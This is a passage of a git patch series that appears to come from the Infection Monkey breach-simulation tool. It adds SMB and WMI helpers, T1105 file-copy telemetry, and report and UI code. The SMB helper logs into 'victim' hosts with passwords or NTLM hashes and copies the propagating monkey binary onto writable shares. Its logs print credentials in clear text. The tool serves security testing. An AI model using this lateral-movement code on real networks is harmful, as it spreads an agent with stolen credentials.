hash: %s, NTLM hash: %s", + host, username, password, lm_hash, ntlm_hash) + + try: + smb.logoff() + except: + pass + + return None + + try: + resp = SmbTools.execute_rpc_call(smb, "hNetrServerGetInfo", 102) + except Exception as exc: + LOG.debug("Error requesting server info from %r over SMB: %s", + host, exc) + return None + + info = {'major_version': resp['InfoStruct']['ServerInfo102']['sv102_version_major'], + 'minor_version': resp['InfoStruct']['ServerInfo102']['sv102_version_minor'], + 'server_name': resp['InfoStruct']['ServerInfo102']['sv102_name'].strip("\0 "), + 'server_comment': resp['InfoStruct']['ServerInfo102']['sv102_comment'].strip("\0 "), + 'server_user_path': resp['InfoStruct']['ServerInfo102']['sv102_userpath'].strip("\0 "), + 'simultaneous_users': resp['InfoStruct']['ServerInfo102']['sv102_users']} + + LOG.debug("Connected to %r using %s:\n%s", + host, dialect, pprint.pformat(info)) + + try: + resp = SmbTools.execute_rpc_call(smb, "hNetrShareEnum", 2) + except Exception as exc: + LOG.debug("Error enumerating server shares from %r over SMB: %s", + host, exc) + return None + + resp = resp['InfoStruct']['ShareInfo']['Level2']['Buffer'] + + high_priority_shares = () + low_priority_shares = () + file_name = ntpath.split(dst_path)[-1] + + for i in range(len(resp)): + share_name = resp[i]['shi2_netname'].strip("\0 ") + share_path = resp[i]['shi2_path'].strip("\0 ") + current_uses = resp[i]['shi2_current_uses'] + max_uses = resp[i]['shi2_max_uses'] + + if current_uses >= max_uses: + LOG.debug("Skipping share '%s' on victim %r because max uses is exceeded", + share_name, host) + continue + elif not share_path: + LOG.debug("Skipping share '%s' on victim %r because share path is invalid", + share_name, host) + continue + + share_info = {'share_name': share_name, + 'share_path': share_path} + + if dst_path.lower().startswith(share_path.lower()): + high_priority_shares += ((ntpath.sep + dst_path[len(share_path):], share_info),) + + low_priority_shares += ((ntpath.sep + file_name, share_info),) + + shares = high_priority_shares + low_priority_shares + + file_uploaded = False + for remote_path, share in shares: + share_name = share['share_name'] + share_path = share['share_path'] + + if not smb: + smb, _ = SmbTools.new_smb_connection(host, username, password, lm_hash, ntlm_hash, timeout) + if not smb: + return None + + try: + tid = smb.connectTree(share_name) + except Exception as exc: + LOG.debug("Error connecting tree to share '%s' on victim %r: %s", + share_name, host, exc) + continue + + LOG.debug("Trying to copy monkey file to share '%s' [%s + %s] on victim %r", + share_name, share_path, remote_path, host.ip_addr[0], ) + + remote_full_path = ntpath.join(share_path, remote_path.strip(ntpath.sep)) + + # check if file is found on destination + if config.skip_exploit_if_file_exist: + try: + file_info = smb.listPath(share_name, remote_path) + if file_info: + if src_file_size == file_info[0].get_filesize(): + LOG.debug("Remote monkey file is same as source, skipping copy") + return remote_full_path + + LOG.debug("Remote monkey file is found but different, moving along with attack") + except: + pass # file isn't found on remote victim, moving on + + try: + with monkeyfs.open(src_path, 'rb') as source_file: + # make sure of the timeout + smb.setTimeout(timeout) + smb.putFile(share_name, remote_path, source_file.read) + + file_uploaded = True + T1105Telem(ScanStatus.USED, host.ip_addr[0], dst_path).send() + LOG.info("Copied monkey file '%s' to remote share '%s' [%s] on victim %r", + src_path, share_name, share_path, host) + + break + except Exception as exc: + LOG.debug("Error uploading monkey to share '%s' on victim %r: %s", + share_name, host, exc) + T1105Telem(ScanStatus.SCANNED, host.ip_addr[0], dst_path).send() + continue + finally: + try: + smb.logoff() + except: + pass + + smb = None + + if not file_uploaded: + LOG.debug("Couldn't find a writable share for exploiting" + " victim %r with username: %s, password: '%s', LM hash: %s, NTLM hash: %s", + host, username, password, lm_hash, ntlm_hash) + return None + + return remote_full_path + + @staticmethod + def new_smb_connection(host, username, password, lm_hash='', ntlm_hash='', timeout=60): + try: + smb = SMBConnection(host.ip_addr, host.ip_addr, sess_port=445) + except Exception as exc: + LOG.debug("SMB connection to %r on port 445 failed," + " trying port 139 (%s)", host, exc) + + try: + smb = SMBConnection('*SMBSERVER', host.ip_addr, sess_port=139) + except Exception as exc: + LOG.debug("SMB connection to %r on port 139 failed as well (%s)", + host, exc) + return None, None + + dialect = {SMB_DIALECT: "SMBv1", + SMB2_DIALECT_002: "SMBv2.0", + SMB2_DIALECT_21: "SMBv2.1"}.get(smb.getDialect(), "SMBv3.0") + + # we know this should work because the WMI connection worked + try: + smb.login(username, password, '', lm_hash, ntlm_hash) + except Exception as exc: + LOG.debug("Error while logging into %r using user: %s, password: '%s', LM hash: %s, NTLM hash: %s: %s", + host, username, password, lm_hash, ntlm_hash, exc) + return None, dialect + + smb.setTimeout(timeout) + return smb, dialect + + @staticmethod + def execute_rpc_call(smb, rpc_func, *args): + dce = SmbTools.get_dce_bind(smb) + rpc_method_wrapper = getattr(srvs, rpc_func, None) + if not rpc_method_wrapper: + raise ValueError("Cannot find RPC method '%s'" % (rpc_method_wrapper,)) + + return rpc_method_wrapper(dce, *args) + + @staticmethod + def get_dce_bind(smb): + rpctransport = transport.SMBTransport(smb.getRemoteHost(), + smb.getRemoteHost(), + filename=r'\srvsvc', + smb_connection=smb) + dce = rpctransport.get_dce_rpc() + dce.connect() + dce.bind(srvs.MSRPC_UUID_SRVS) + + return dce diff --git a/monkey/infection_monkey/exploit/tools/wmi_tools.py b/monkey/infection_monkey/exploit/tools/wmi_tools.py new file mode 100644 index 000000000..abbb9f936 --- /dev/null +++ b/monkey/infection_monkey/exploit/tools/wmi_tools.py @@ -0,0 +1,150 @@ +import logging + +from impacket.dcerpc.v5.dcom import wmi +from impacket.dcerpc.v5.dcom.wmi import DCERPCSessionError +from impacket.dcerpc.v5.dcomrt import DCOMConnection +from impacket.dcerpc.v5.dtypes import NULL + +__author__ = 'itamar' + +LOG = logging.getLogger(__name__) + + +class DceRpcException(Exception): + pass + + +class AccessDeniedException(Exception): + def __init__(self, host, username, password, domain): + super(AccessDeniedException, self).__init__("Access is denied to %r with username %s\\%s and password %r" % + (host, domain, username, password)) + + +class WmiTools(object): + class WmiConnection(object): + def __init__(self): + self._dcom = None + self._iWbemServices = None + + @property + def connected(self): + return self._dcom is not None + + def connect(self, host, username, password, domain=None, lmhash="", nthash=""): + if not domain: + domain = host.ip_addr + + dcom = DCOMConnection(host.ip_addr, + username=username, + password=password, + domain=domain, + lmhash=lmhash, + nthash=nthash, + oxidResolver=True) + + try: + iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, + wmi.IID_IWbemLevel1Login) + except Exception as exc: + dcom.disconnect() + + if "rpc_s_access_denied" == exc.message: + raise AccessDeniedException(host, username, password, domain) + + raise + + iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface) + + try: + self._iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL) + self._dcom = dcom + except: + dcom.disconnect() + + raise + finally: + iWbemLevel1Login.RemRelease() + + def close(self): + assert self.connected, "WmiConnection isn't connected" + + self._iWbemServices.RemRelease() + self._iWbemServices = None + + self._dcom.disconnect() + self._dcom = None + + @staticmethod + def dcom_wrap(func): + def _wrapper(*args, **kwarg): + try: + return func(*args, **kwarg) + finally: + WmiTools.dcom_cleanup() + + return _wrapper + + @staticmethod + def dcom_cleanup(): + for port_map in DCOMConnection.PORTMAPS.keys(): + del DCOMConnection.PORTMAPS[port_map] + for oid_set in DCOMConnection.OID_SET.keys(): + del DCOMConnection.OID_SET[port_map] + + DCOMConnection.OID_SET = {} + DCOMConnection.PORTMAPS = {} + if DCOMConnection.PINGTIMER: + DCOMConnection.PINGTIMER.cancel() + DCOMConnection.PINGTIMER.join() + DCOMConnection.PINGTIMER = None + + @staticmethod + def get_object(wmi_connection, object_name): + assert isinstance(wmi_connection, WmiTools.WmiConnection) + assert wmi_connection.connected, "WmiConnection isn't connected" + + return wmi_connection._iWbemServices.GetObject(object_name)[0] + + @staticmethod + def list_object(wmi_connection, object_name, fields=None, where=None): + assert isinstance(wmi_connection, WmiTools.WmiConnection) + assert wmi_connection.connected, "WmiConnection isn't connected" + + if fields: + fields_query = ",".join(fields) + else: + fields_query = "*" + + wql_query = "SELECT %s FROM %s" % (fields_query, object_name) + + if where: + wql_query += " WHERE %s" % (where,) + + LOG.debug("Execution WQL query: %r", wql_query) + + iEnumWbemClassObject = wmi_connection._iWbemServices.ExecQuery(wql_query) + + query = [] + try: + while True: + try: + next_item = iEnumWbemClassObject.Next(0xffffffff, 1)[0] + record = next_item.getProperties() + + if not fields: + fields = record.keys() + + query_record = {} + for key in fields: + query_record[key] = record[key]['value'] + + query.append(query_record) + except DCERPCSessionError as exc: + if 1 == exc.error_code: + break + + raise + finally: + iEnumWbemClassObject.RemRelease() + + return query diff --git a/monkey/infection_monkey/exploit/vsftpd.py b/monkey/infection_monkey/exploit/vsftpd.py index 498c09eea..adac06f2d 100644 --- a/monkey/infection_monkey/exploit/vsftpd.py +++ b/monkey/infection_monkey/exploit/vsftpd.py @@ -7,8 +7,8 @@ import socket import time from infection_monkey.exploit import HostExploiter -from infection_monkey.exploit.tools import build_monkey_commandline -from infection_monkey.exploit.tools import get_target_monkey, HTTPTools, get_monkey_depth +from infection_monkey.exploit.tools.helpers import get_target_monkey, build_monkey_commandline, get_monkey_depth +from infection_monkey.exploit.tools.http_tools import HTTPTools from infection_monkey.model import MONKEY_ARG, CHMOD_MONKEY, RUN_MONKEY, WGET_HTTP_UPLOAD, DOWNLOAD_TIMEOUT from logging import getLogger diff --git a/monkey/infection_monkey/exploit/web_rce.py b/monkey/infection_monkey/exploit/web_rce.py index fe45c65ce..b33a3cfb5 100644 --- a/monkey/infection_monkey/exploit/web_rce.py +++ b/monkey/infection_monkey/exploit/web_rce.py @@ -5,7 +5,8 @@ from abc import abstractmethod from infection_monkey.exploit import HostExploiter from infection_monkey.model import * -from infection_monkey.exploit.tools import get_target_monkey, get_monkey_depth, build_monkey_commandline, HTTPTools +from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline +from infection_monkey.exploit.tools.http_tools import HTTPTools from infection_monkey.network.tools import check_tcp_port, tcp_port_to_service from infection_monkey.telemetry.attack.t1197_telem import T1197Telem from common.utils.attack_utils import ScanStatus, BITS_UPLOAD_STRING diff --git a/monkey/infection_monkey/exploit/weblogic.py b/monkey/infection_monkey/exploit/weblogic.py index 4c99f82b9..3d38b0fcf 100644 --- a/monkey/infection_monkey/exploit/weblogic.py +++ b/monkey/infection_monkey/exploit/weblogic.py @@ -8,7 +8,8 @@ from __future__ import print_function from requests import post, exceptions from infection_monkey.exploit.web_rce import WebRCE -from infection_monkey.exploit.tools import get_free_tcp_port, get_interface_to_target +from infection_monkey.exploit.tools.helpers import get_interface_to_target +from infection_monkey.network.info import get_free_tcp_port from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer import threading diff --git a/monkey/infection_monkey/exploit/win_ms08_067.py b/monkey/infection_monkey/exploit/win_ms08_067.py index e1d2e5b85..2cf5010b2 100644 --- a/monkey/infection_monkey/exploit/win_ms08_067.py +++ b/monkey/infection_monkey/exploit/win_ms08_067.py @@ -14,11 +14,11 @@ from enum import IntEnum from impacket import uuid from impacket.dcerpc.v5 import transport -from infection_monkey.exploit.tools import SmbTools, get_target_monkey, get_monkey_depth +from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline +from infection_monkey.exploit.tools.smb_tools import SmbTools from infection_monkey.model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS from infection_monkey.network import SMBFinger from infection_monkey.network.tools import check_tcp_port -from infection_monkey.exploit.tools import build_monkey_commandline from . import HostExploiter LOG = getLogger(__name__) diff --git a/monkey/infection_monkey/exploit/wmiexec.py b/monkey/infection_monkey/exploit/wmiexec.py index 9439d7414..c9287a25e 100644 --- a/monkey/infection_monkey/exploit/wmiexec.py +++ b/monkey/infection_monkey/exploit/wmiexec.py @@ -6,8 +6,11 @@ import traceback from impacket.dcerpc.v5.rpcrt import DCERPCException from infection_monkey.exploit import HostExploiter -from infection_monkey.exploit.tools import SmbTools, WmiTools, AccessDeniedException, get_target_monkey, \ +from infection_monkey.exploit.tools.helpers import get_target_monkey, \ get_monkey_depth, build_monkey_commandline +from infection_monkey.exploit.tools.wmi_tools import AccessDeniedException +from infection_monkey.exploit.tools.smb_tools import SmbTools +from infection_monkey.exploit.tools.wmi_tools import WmiTools from infection_monkey.model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS from common.utils.exploit_enum import ExploitType diff --git a/monkey/infection_monkey/monkey.py b/monkey/infection_monkey/monkey.py index 06e0f267b..0456ffba2 100644 --- a/monkey/infection_monkey/monkey.py +++ b/monkey/infection_monkey/monkey.py @@ -19,7 +19,7 @@ from infection_monkey.telemetry.attack.victim_host_telem import VictimHostTelem from infection_monkey.windows_upgrader import WindowsUpgrader from infection_monkey.post_breach.post_breach_handler import PostBreach from common.utils.attack_utils import ScanStatus -from infection_monkey.exploit.tools import get_interface_to_target +from infection_monkey.exploit.tools.helpers import get_interface_to_target __author__ = 'itamar' diff --git a/monkey/infection_monkey/post_breach/actions/users_custom_pba.py b/monkey/infection_monkey/post_breach/actions/users_custom_pba.py index 61ec6f5d7..1a2070ac1 100644 --- a/monkey/infection_monkey/post_breach/actions/users_custom_pba.py +++ b/monkey/infection_monkey/post_breach/actions/users_custom_pba.py @@ -6,6 +6,9 @@ from infection_monkey.post_breach.pba import PBA from infection_monkey.control import ControlClient from infection_monkey.config import WormConfiguration from infection_monkey.utils import get_monkey_dir_path +from infection_monkey.telemetry.attack.t1105_telem import T1105Telem +from common.utils.attack_utils import ScanStatus +from infection_monkey.exploit.tools.helpers import get_interface_to_target LOG = logging.getLogger(__name__) @@ -81,7 +84,13 @@ class UsersPBA(PBA): if not pba_file_contents or not pba_file_contents.content: LOG.error("Island didn't respond with post breach file.") + T1105Telem(ScanStatus.SCANNED, + get_interface_to_target(WormConfiguration.current_server.split(':')[0]), + filename).send() return False + T1105Telem(ScanStatus.USED, + get_interface_to_target(WormConfiguration.current_server.split(':')[0]), + filename).send() try: with open(os.path.join(dst_dir, filename), 'wb') as written_PBA_file: written_PBA_file.write(pba_file_contents.content) diff --git a/monkey/infection_monkey/telemetry/attack/t1105_telem.py b/monkey/infection_monkey/telemetry/attack/t1105_telem.py new file mode 100644 index 000000000..171c4b963 --- /dev/null +++ b/monkey/infection_monkey/telemetry/attack/t1105_telem.py @@ -0,0 +1,22 @@ +from infection_monkey.telemetry.attack.victim_host_telem import AttackTelem + + +class T1105Telem(AttackTelem): + def __init__(self, status, host, path): + """ + T1105 telemetry. + :param status: ScanStatus of technique + :param host: IP of machine which downloaded the file + :param path: Uploaded file's path + """ + super(T1105Telem, self).__init__('T1105', status) + self.path = path + self.host = host + + def get_data(self): + data = super(T1105Telem, self).get_data() + data.update({ + 'path': self.path, + 'host': self.host + }) + return data diff --git a/monkey/infection_monkey/transport/http.py b/monkey/infection_monkey/transport/http.py index 0f01cf64a..b4cb2e488 100644 --- a/monkey/infection_monkey/transport/http.py +++ b/monkey/infection_monkey/transport/http.py @@ -6,7 +6,6 @@ import threading import urllib from logging import getLogger from urlparse import urlsplit -from threading import Lock import infection_monkey.monkeyfs as monkeyfs from infection_monkey.transport.base import TransportProxyBase, update_last_serve_time @@ -165,11 +164,15 @@ class HTTPServer(threading.Thread): def run(self): class TempHandler(FileServHTTPRequestHandler): + from common.utils.attack_utils import ScanStatus + from infection_monkey.telemetry.attack.t1105_telem import T1105Telem + filename = self._filename @staticmethod def report_download(dest=None): LOG.info('File downloaded from (%s,%s)' % (dest[0], dest[1])) + TempHandler.T1105Telem(TempHandler.ScanStatus.USED, dest[0], self._filename).send() self.downloads += 1 if not self.downloads < self.max_downloads: return True @@ -212,11 +215,14 @@ class LockedHTTPServer(threading.Thread): def run(self): class TempHandler(FileServHTTPRequestHandler): + from common.utils.attack_utils import ScanStatus + from infection_monkey.telemetry.attack.t1105_telem import T1105Telem filename = self._filename @staticmethod def report_download(dest=None): LOG.info('File downloaded from (%s,%s)' % (dest[0], dest[1])) + TempHandler.T1105Telem(TempHandler.ScanStatus.USED, dest[0], self._filename).send() self.downloads += 1 if not self.downloads < self.max_downloads: return True diff --git a/monkey/infection_monkey/tunnel.py b/monkey/infection_monkey/tunnel.py index 999f4d7fc..722dea50e 100644 --- a/monkey/infection_monkey/tunnel.py +++ b/monkey/infection_monkey/tunnel.py @@ -9,7 +9,7 @@ from infection_monkey.network.firewall import app as firewall from infection_monkey.network.info import local_ips, get_free_tcp_port from infection_monkey.network.tools import check_tcp_port from infection_monkey.transport.base import get_last_serve_time -from infection_monkey.exploit.tools import get_interface_to_target +from infection_monkey.exploit.tools.helpers import get_interface_to_target __author__ = 'hoffer' diff --git a/monkey/infection_monkey/windows_upgrader.py b/monkey/infection_monkey/windows_upgrader.py index a79d38490..4a165940d 100644 --- a/monkey/infection_monkey/windows_upgrader.py +++ b/monkey/infection_monkey/windows_upgrader.py @@ -8,7 +8,7 @@ import time import infection_monkey.monkeyfs as monkeyfs from infection_monkey.config import WormConfiguration from infection_monkey.control import ControlClient -from infection_monkey.exploit.tools import build_monkey_commandline_explicitly +from infection_monkey.exploit.tools.helpers import build_monkey_commandline_explicitly from infection_monkey.model import MONKEY_CMDLINE_WINDOWS from infection_monkey.utils import is_windows_os, is_64bit_windows_os, is_64bit_python From 685362a5f4c5be6aa5832ef6f8fd6488e05a1a6c Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Fri, 5 Jul 2019 16:05:35 +0300 Subject: [PATCH 2/6] Implemented file copy technique's report parsing. --- monkey/infection_monkey/exploit/sambacry.py | 6 ++- monkey/infection_monkey/exploit/sshexec.py | 11 ++++- .../exploit/tools/smb_tools.py | 11 ++++- .../post_breach/actions/users_custom_pba.py | 2 + .../telemetry/attack/t1105_telem.py | 17 ++++---- monkey/infection_monkey/transport/http.py | 11 ++++- .../cc/services/attack/attack_report.py | 5 ++- .../cc/services/attack/attack_schema.py | 8 ++++ .../attack/technique_reports/T1105.py | 25 ++++++++++++ .../attack/technique_reports/__init__.py | 12 +++--- .../components/attack/techniques/Helpers.js | 6 ++- .../src/components/attack/techniques/T1105.js | 40 +++++++++++++++++++ .../report-components/AttackReport.js | 4 +- 13 files changed, 134 insertions(+), 24 deletions(-) create mode 100644 monkey/monkey_island/cc/services/attack/technique_reports/T1105.py create mode 100644 monkey/monkey_island/cc/ui/src/components/attack/techniques/T1105.js diff --git a/monkey/infection_monkey/exploit/sambacry.py b/monkey/infection_monkey/exploit/sambacry.py index 9a9f934fb..86e43c73c 100644 --- a/monkey/infection_monkey/exploit/sambacry.py +++ b/monkey/infection_monkey/exploit/sambacry.py @@ -20,6 +20,7 @@ from infection_monkey.exploit import HostExploiter from infection_monkey.model import DROPPER_ARG from infection_monkey.network.smbfinger import SMB_SERVICE from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_target_monkey_by_os, get_monkey_depth +from infection_monkey.exploit.tools.helpers import get_interface_to_target from infection_monkey.pyinstaller_utils import get_binary_file_path from common.utils.attack_utils import ScanStatus from infection_monkey.telemetry.attack.t1105_telem import T1105Telem @@ -268,7 +269,10 @@ class SambaCryExploiter(HostExploiter): with monkeyfs.open(monkey_bin_64_src_path, "rb") as monkey_bin_file: smb_client.putFile(share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_64, monkey_bin_file.read) - T1105Telem(ScanStatus.USED, self.host.ip_addr[0], monkey_bin_64_src_path).send() + T1105Telem(ScanStatus.USED, + get_interface_to_target(self.host.ip_addr[0]), + self.host.ip_addr[0], + monkey_bin_64_src_path).send() smb_client.disconnectTree(tree_id) def trigger_module(self, smb_client, share): diff --git a/monkey/infection_monkey/exploit/sshexec.py b/monkey/infection_monkey/exploit/sshexec.py index 1c616c6e1..2c56471a4 100644 --- a/monkey/infection_monkey/exploit/sshexec.py +++ b/monkey/infection_monkey/exploit/sshexec.py @@ -7,6 +7,7 @@ import StringIO import infection_monkey.monkeyfs as monkeyfs from infection_monkey.exploit import HostExploiter from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline +from infection_monkey.exploit.tools.helpers import get_interface_to_target from infection_monkey.model import MONKEY_ARG from infection_monkey.network.tools import check_tcp_port from common.utils.exploit_enum import ExploitType @@ -163,11 +164,17 @@ class SSHExploiter(HostExploiter): ftp.putfo(file_obj, self._config.dropper_target_path_linux, file_size=monkeyfs.getsize(src_path), callback=self.log_transfer) ftp.chmod(self._config.dropper_target_path_linux, 0o777) - T1105Telem(ScanStatus.USED, self.host.ip_addr[0], src_path).send() + T1105Telem(ScanStatus.USED, + get_interface_to_target(self.host.ip_addr[0]), + self.host.ip_addr[0], + src_path).send() ftp.close() except Exception as exc: LOG.debug("Error uploading file into victim %r: (%s)", self.host, exc) - T1105Telem(ScanStatus.SCANNED, self.host.ip_addr[0], src_path).send() + T1105Telem(ScanStatus.SCANNED, + get_interface_to_target(self.host.ip_addr[0]), + self.host.ip_addr[0], + src_path).send() return False try: diff --git a/monkey/infection_monkey/exploit/tools/smb_tools.py b/monkey/infection_monkey/exploit/tools/smb_tools.py index 89e755d28..af088d9eb 100644 --- a/monkey/infection_monkey/exploit/tools/smb_tools.py +++ b/monkey/infection_monkey/exploit/tools/smb_tools.py @@ -10,6 +10,7 @@ import infection_monkey.config import infection_monkey.monkeyfs as monkeyfs from common.utils.attack_utils import ScanStatus from infection_monkey.telemetry.attack.t1105_telem import T1105Telem +from infection_monkey.exploit.tools.helpers import get_interface_to_target __author__ = 'itamar' @@ -138,7 +139,10 @@ class SmbTools(object): smb.putFile(share_name, remote_path, source_file.read) file_uploaded = True - T1105Telem(ScanStatus.USED, host.ip_addr[0], dst_path).send() + T1105Telem(ScanStatus.USED, + get_interface_to_target(host.ip_addr[0]), + host.ip_addr[0], + dst_path).send() LOG.info("Copied monkey file '%s' to remote share '%s' [%s] on victim %r", src_path, share_name, share_path, host) @@ -146,7 +150,10 @@ class SmbTools(object): except Exception as exc: LOG.debug("Error uploading monkey to share '%s' on victim %r: %s", share_name, host, exc) - T1105Telem(ScanStatus.SCANNED, host.ip_addr[0], dst_path).send() + T1105Telem(ScanStatus.SCANNED, + get_interface_to_target(host.ip_addr[0]), + host.ip_addr[0], + dst_path).send() continue finally: try: diff --git a/monkey/infection_monkey/post_breach/actions/users_custom_pba.py b/monkey/infection_monkey/post_breach/actions/users_custom_pba.py index 1a2070ac1..d923cb60e 100644 --- a/monkey/infection_monkey/post_breach/actions/users_custom_pba.py +++ b/monkey/infection_monkey/post_breach/actions/users_custom_pba.py @@ -85,10 +85,12 @@ class UsersPBA(PBA): if not pba_file_contents or not pba_file_contents.content: LOG.error("Island didn't respond with post breach file.") T1105Telem(ScanStatus.SCANNED, + WormConfiguration.current_server.split(':')[0], get_interface_to_target(WormConfiguration.current_server.split(':')[0]), filename).send() return False T1105Telem(ScanStatus.USED, + WormConfiguration.current_server.split(':')[0], get_interface_to_target(WormConfiguration.current_server.split(':')[0]), filename).send() try: diff --git a/monkey/infection_monkey/telemetry/attack/t1105_telem.py b/monkey/infection_monkey/telemetry/attack/t1105_telem.py index 171c4b963..454391da8 100644 --- a/monkey/infection_monkey/telemetry/attack/t1105_telem.py +++ b/monkey/infection_monkey/telemetry/attack/t1105_telem.py @@ -2,21 +2,24 @@ from infection_monkey.telemetry.attack.victim_host_telem import AttackTelem class T1105Telem(AttackTelem): - def __init__(self, status, host, path): + def __init__(self, status, src, dst, filename): """ T1105 telemetry. :param status: ScanStatus of technique - :param host: IP of machine which downloaded the file - :param path: Uploaded file's path + :param src: IP of machine which uploaded the file + :param dst: IP of machine which downloaded the file + :param filename: Uploaded file's name """ super(T1105Telem, self).__init__('T1105', status) - self.path = path - self.host = host + self.filename = filename + self.src = src + self.dst = dst def get_data(self): data = super(T1105Telem, self).get_data() data.update({ - 'path': self.path, - 'host': self.host + 'filename': self.filename, + 'src': self.src, + 'dst': self.dst }) return data diff --git a/monkey/infection_monkey/transport/http.py b/monkey/infection_monkey/transport/http.py index b4cb2e488..8da49f637 100644 --- a/monkey/infection_monkey/transport/http.py +++ b/monkey/infection_monkey/transport/http.py @@ -9,6 +9,7 @@ from urlparse import urlsplit import infection_monkey.monkeyfs as monkeyfs from infection_monkey.transport.base import TransportProxyBase, update_last_serve_time +from infection_monkey.exploit.tools.helpers import get_interface_to_target __author__ = 'hoffer' @@ -172,7 +173,10 @@ class HTTPServer(threading.Thread): @staticmethod def report_download(dest=None): LOG.info('File downloaded from (%s,%s)' % (dest[0], dest[1])) - TempHandler.T1105Telem(TempHandler.ScanStatus.USED, dest[0], self._filename).send() + TempHandler.T1105Telem(TempHandler.ScanStatus.USED, + get_interface_to_target(dest[0]), + dest[0], + self._filename).send() self.downloads += 1 if not self.downloads < self.max_downloads: return True @@ -222,7 +226,10 @@ class LockedHTTPServer(threading.Thread): @staticmethod def report_download(dest=None): LOG.info('File downloaded from (%s,%s)' % (dest[0], dest[1])) - TempHandler.T1105Telem(TempHandler.ScanStatus.USED, dest[0], self._filename).send() + TempHandler.T1105Telem(TempHandler.ScanStatus.USED, + get_interface_to_target(dest[0]), + dest[0], + self._filename).send() self.downloads += 1 if not self.downloads < self.max_downloads: return True diff --git a/monkey/monkey_island/cc/services/attack/attack_report.py b/monkey/monkey_island/cc/services/attack/attack_report.py index 7bec85a32..fdf57fb85 100644 --- a/monkey/monkey_island/cc/services/attack/attack_report.py +++ b/monkey/monkey_island/cc/services/attack/attack_report.py @@ -1,6 +1,6 @@ import logging from monkey_island.cc.services.attack.technique_reports import T1210, T1197, T1110, T1075, T1003, T1059, T1086, T1082 -from monkey_island.cc.services.attack.technique_reports import T1145 +from monkey_island.cc.services.attack.technique_reports import T1145, T1105 from monkey_island.cc.services.attack.attack_config import AttackConfig from monkey_island.cc.database import mongo @@ -17,7 +17,8 @@ TECHNIQUES = {'T1210': T1210.T1210, 'T1059': T1059.T1059, 'T1086': T1086.T1086, 'T1082': T1082.T1082, - 'T1145': T1145.T1145} + 'T1145': T1145.T1145, + 'T1105': T1105.T1105} REPORT_NAME = 'new_report' diff --git a/monkey/monkey_island/cc/services/attack/attack_schema.py b/monkey/monkey_island/cc/services/attack/attack_schema.py index 00d3e9536..be53a7555 100644 --- a/monkey/monkey_island/cc/services/attack/attack_schema.py +++ b/monkey/monkey_island/cc/services/attack/attack_schema.py @@ -40,6 +40,14 @@ SCHEMA = { "necessary": False, "description": "Pass the hash (PtH) is a method of authenticating as a user without " "having access to the user's cleartext password." + }, + "T1105": { + "title": "T1105 Remote file copy", + "type": "bool", + "value": True, + "necessary": True, + "description": "Files may be copied from one system to another to stage " + "adversary tools or other files over the course of an operation." } } }, diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1105.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1105.py new file mode 100644 index 000000000..176bae052 --- /dev/null +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1105.py @@ -0,0 +1,25 @@ +from monkey_island.cc.services.attack.technique_reports import AttackTechnique +from monkey_island.cc.database import mongo + +__author__ = "VakarisZ" + + +class T1105(AttackTechnique): + + tech_id = "T1105" + unscanned_msg = "Monkey didn't try to copy files to any systems." + scanned_msg = "Monkey tried to copy files, but failed." + used_msg = "Monkey successfully copied files to systems on the network." + + query = [{'$match': {'telem_category': 'attack', + 'data.technique': tech_id}}, + {'$project': {'_id': 0, + 'src': '$data.src', + 'dst': '$data.dst', + 'filename': '$data.filename'}}] + + @staticmethod + def get_report_data(): + data = T1105.get_tech_base_data() + data.update({'files': list(mongo.db.telemetry.aggregate(T1105.query))}) + return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/__init__.py b/monkey/monkey_island/cc/services/attack/technique_reports/__init__.py index edd180d50..81b7dd6bf 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/__init__.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/__init__.py @@ -52,13 +52,13 @@ class AttackTechnique(object): Gets the status of a certain attack technique. :return: ScanStatus Enum object """ - if mongo.db.attack_results.find_one({'telem_category': 'attack', - 'status': ScanStatus.USED.value, - 'technique': cls.tech_id}): + if mongo.db.telemetry.find_one({'telem_category': 'attack', + 'data.status': ScanStatus.USED.value, + 'data.technique': cls.tech_id}): return ScanStatus.USED - elif mongo.db.attack_results.find_one({'telem_category': 'attack', - 'status': ScanStatus.SCANNED.value, - 'technique': cls.tech_id}): + elif mongo.db.telemetry.find_one({'telem_category': 'attack', + 'data.status': ScanStatus.SCANNED.value, + 'data.technique': cls.tech_id}): return ScanStatus.SCANNED else: return ScanStatus.UNSCANNED diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/Helpers.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/Helpers.js index 9885219ad..1060f4b2d 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/Helpers.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/Helpers.js @@ -11,7 +11,11 @@ export function renderMachine(val){ export function renderMachineFromSystemData(data) { let machineStr = data['hostname'] + " ( "; data['ips'].forEach(function(ipInfo){ - machineStr += ipInfo['addr'] + " "; + if(typeof ipInfo === "object"){ + machineStr += ipInfo['addr'] + " "; + } else { + machineStr += ipInfo + " "; + } }); return machineStr + ")" } diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1105.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1105.js new file mode 100644 index 000000000..3f0438245 --- /dev/null +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1105.js @@ -0,0 +1,40 @@ +import React from 'react'; +import '../../../styles/Collapse.scss' +import ReactTable from "react-table"; +import { renderMachineFromSystemData } from "./Helpers" + + +class T1105 extends React.Component { + + constructor(props) { + super(props); + } + + static getFilesColumns() { + return ([{ + Header: 'Files copied.', + columns: [ + {Header: 'Src. Machine', 